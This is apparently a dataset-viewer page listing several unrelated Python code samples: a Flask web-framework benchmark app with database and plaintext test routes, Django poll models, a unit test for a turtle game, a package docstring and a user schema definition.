while len(ids) < num_queries:
ids.add(randint(1, 10000))
return list(sorted(ids))
@app.route("/json")
def hello():
return jsonify(message="Hello, World!")
@app.route("/query")
def get_random_world():
with orm.db_session(serializable=False):
worlds = [World[ident].to_dict() for ident in generate_ids(get_num_queries())]
return jsonify(worlds)
@app.route("/db")
def get_random_world_single():
wid = randint(1, 10000)
with orm.db_session(serializable=False):
world = World[wid]
return jsonify(world.to_dict())
@app.route("/fortunes")
def get_fortunes():
with orm.db_session(serializable=False):
fortunes = list(orm.select(fortune for fortune in Fortune))
tmp_fortune = namedtuple("Fortune", ["id", "message"])
fortunes.append(
tmp_fortune(id=0, message="Additional fortune added at request time.")
)
fortunes.sort(key=attrgetter("message"))
return render_template("fortunes.html", fortunes=fortunes)
@app.route("/updates")
def updates():
"""Test 5: Database Updates"""
num_queries = get_num_queries()
ids = generate_ids(num_queries)
ids.sort()
worlds = []
with orm.db_session(serializable=False):
for ident in ids:
world = World[ident]
world.randomNumber = randint(1, 10000)
worlds.append({"id": world.id, "randomNumber": world.randomNumber})
return jsonify(worlds)
@app.route("/plaintext")
def plaintext():
"""Test 6: Plaintext"""
response = make_response(b"Hello, World!")
response.content_type = "text/plain"
return response
try:
import meinheld
meinheld.server.set_access_logger(None)
meinheld.set_keepalive(120)
except ImportError:
pass
# entry point for debugging
if __name__ == "__main__":
app.run(debug=True)
|
from django.db import models
from .validators import validate_length
class Poll(models.Model):
state = models.CharField(max_length=256)
begin_time = models.DateTimeField()
end_time = models.DateTimeField()
name = models.CharField(max_length=512)
class Vote(models.Model):
option = models.CharField(max_length=512)
sign = models.CharField(max_length=64, validators=[validate_length])
poll = models.ForeignKey(Poll, on_delete=models.RESTRICT)
|
"""
unit testing of bounce.py
"""
import os
import sys
import unittest
from turtle import *
from freegames.utils import vector
class memoryTestCase(unittest.TestCase):
def test_memory_index(self):
from freegames.memory import index
testx = 100
testy = 200
output = index(testx, testy)
self.assertEquals(output, 70)
def test_memory_xy(self):
from freegames.memory import xy
num = 50
compare = xy(num)
self.assertEquals((-100, 100), compare)
|
"""Command-line scripts provided by the desisurvey package.
"""
|
from app.helpers.regex_helper import RegexHelper
users = {
'item_title': 'User',
'schema': {
'name': {
'type': 'string',
'required': True,
'regex': RegexHelper.USERNAME
},
'email': {
'type': 'string',
'unique': True,
'regex': RegexHelper.EMAIL_ADDRESS
},
'password': {
'type': 'string',
},
'role': {
'type': 'string',
'allowed': ['admin', 'player']
},
'access_right': {
'type': 'objectid',
'data_relation': {
'resource': 'access--rights',
'embeddable': True
}
}
}
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.